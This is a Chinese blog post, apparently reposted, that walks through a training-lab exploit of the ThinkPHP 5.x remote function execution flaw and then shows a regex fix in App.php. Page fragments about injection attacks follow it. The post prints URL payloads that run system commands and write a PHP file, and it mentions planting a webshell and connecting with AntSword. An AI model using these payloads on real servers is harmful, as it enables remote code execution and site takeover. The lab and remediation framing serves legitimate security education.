摘要:正文实验地址远程函数执行与注入安全龙专注做企业网络安全服务与网络安全培训知识梳理,全称,中文概念验证,常指一段漏洞证明的代码。,全称,中文利用,指利用系统漏洞进行攻击的动作。,中文有效载荷,指成功之后,真正在目标系统执行的代码或指令。
实验地址:ThinkPHP5.x 远程函数执行与sql注入_安全龙-专注做企业网络安全服务与网络安全培训! (anquanlong.com)
知识梳理:
PoC,全称“Proof of Concept”,中文“概念验证”,常指一段漏洞证明的代码。
Exp,全称“Exploit”,中文“利用”,指利用系统漏洞进行攻击的动作。
Payload,中文“有效载荷”,指成功 exploit 之后,真正在目标系统执行的代码或指令。
Shellcode,简单翻译“shell 代码”,是 Payload 的一种,由于其建立正向/反向 shell 而得名。
(用蚁剑连上之后,发现这是安全龙部署在阿里云上的环境)
首先尝试了远程函数漏洞的初始语句:
?s=index//think/app/invokefunction&function=system&return_value=&command=
可执行Linux命令
然后我们按照提示去写入一个文件,phpinfo的功能
利用到了file_put_contents函数(POC分析)
?s=index/think/app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=./test.php&vars[1][]=
回显出了数字18,表示我们写入文件成功
接着进行访问
test.php
出现如上页面,成功利用漏洞。
接着我还尝试了一句话木马的写入,答案显然,也是可以写入并利用的。
最后蚁剑连接即可。
利用完漏洞,对于我们来说最重要的学会去修复
接下来学习修复这个漏洞
1.添加一段代码到App.php的554行
if (!preg_match("/^[A-Za-z](/w)*$/", $controller)) {
throw new HttpException(404, "controller not exists:" . $controller);
}
修改之后,使用原来的poc发现失效了
漏洞修复成功。
文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。
转载请注明本文地址:https://www.ucloud.cn/yun/118914.html
摘要:注入攻击将注入攻击和跨站脚本攻击列入网络应用程序十大常见安全风险。这种类别的攻击包括跨站脚本攻击注入攻击头部注入攻击日志注入攻击和全路径暴露。注入攻击目前最常见的注入攻击形式是臭名昭著的注入攻击。 注入攻击 OWASP将注入攻击和跨站脚本攻击(XSS)列入网络应用程序十大常见安全风险。实际上,它们会一起出现,因为 XSS 攻击依赖于注入攻击的成功。虽然这是最明显的组合关系,但是注入攻击...
摘要:注入注入是一种恶意攻击,用户利用在表单字段输入语句的方式来影响正常的执行。防范方式是针对非法的代码包括单双引号等,使用函数。如许多函数,如可以包含或文件名防范方式过滤用户输入在中设置禁用和。这将禁用的远程文件。 SQL注入 SQL注入是一种恶意攻击,用户利用在表单字段输入SQL语句的方式来影响正常的SQL执行。 防范方式 使用mysql_real_escape_string(),或者...
摘要:攻击者可能会窃取或修改此类保护不力的数据,以实施信用卡欺诈身份盗用或其他犯罪活动。跨站脚本攻击漏洞的防御策略前端过滤字符,后端白名单例如,只允许固定的标签,设置,防止被读取。 目录 WEB安全 OWASP Top 10(2017) Injection - 注入攻击 Broken Authen...
阅读 2070·2021-11-23 09:51
阅读 794·2021-11-22 15:35
阅读 4121·2021-11-22 09:34
阅读 2640·2021-10-12 10:11
阅读 1231·2021-10-08 10:13
阅读 3399·2021-09-02 15:41
阅读 2913·2021-07-22 17:35
阅读 2225·2019-08-30 15:56